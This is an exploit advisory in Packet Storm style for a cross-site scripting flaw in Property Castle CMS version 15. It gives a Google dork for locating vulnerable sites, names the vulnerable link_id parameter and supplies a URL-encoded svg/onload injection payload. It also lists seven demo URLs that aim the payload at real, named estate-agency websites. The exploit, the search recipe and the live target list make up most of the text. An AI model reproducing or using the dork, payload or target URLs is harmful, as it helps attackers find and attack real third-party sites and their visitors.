Property Castle version 15 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
79d31680bb409028d233067e9763a2188976aaab0d9419b8e6cf2e6543f9cb25######################
# Exploit Title : Property Castle XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.propertycastle.com/
# Google Dork : intext:"Powered By Property Castle " inurl:link_id= OR inurl:"/cms/cms.php?link_id="
# Date : 2015/12/06
# Version : PC15
#
######################
#
# Vulnerable Paramter link_id=
#
# Bypass '>">
#
# Demo:
#
#http://www.langworthyestates.com/properties/cms/cms.php?link_id=4%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.olivebranchestate.co.uk/properties/cms/cms.php?link_id=25%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.timesestates.co.uk/properties/cms/cms.php?link_id=23%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.primelodgeestates.com/properties/cms/cms.php?link_id=11%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.phillipshawltd.com/properties/cms/cms.php?link_id=24%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.mskproperties.com/properties/cms/cms.php?link_id=23%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#http://www.champsestates.co.uk/properties/cms/cms.php?link_id=7%27%3E%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FMobham%2F%29%3E
#
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed